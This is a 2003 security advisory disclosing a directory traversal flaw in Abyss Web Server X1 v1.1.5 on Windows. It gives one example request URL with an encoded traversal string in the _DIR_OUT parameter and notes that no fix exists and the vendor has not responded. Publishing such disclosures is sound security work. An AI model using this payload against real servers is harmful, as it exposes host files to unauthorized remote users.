Tripbit Security Advisory
TA-270503 


Severity: 
Medium/High
Application: 
Abyss Web Server X1 Update 1 v1.1.5
Platform: 
Windows
Class: 
Directory Traversal Vulnerability
Release Date: 
May 27th, 2003
Vendor: 
http://aprelium.com


Overview

Abyss is a free and tiny webserver runs on both Windows and Linux systems.

• Details
Possible bug or misconfiguration problem in the web server that allow unauthorized remote users to gain information about the web server's host machine, that will allow them to compromise the system.

Example:

http://host.com/cgi-bin/?_DIR_OUT=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|

• Recommendation
No solution for the moment.

Vendor Response
The vendor has been notified but no answer to this report.

• Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an 'AS IS' condition. There are 'NO' warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

• Additional information
This vulnerability has been found and researched by:

posidron posidron@tripbit.org

rushjo rushjo@tripbit.org

• Availability
You can find the latest version of this warning under the following URL:

http://www.tripbit.org/advisories/TA-270503.html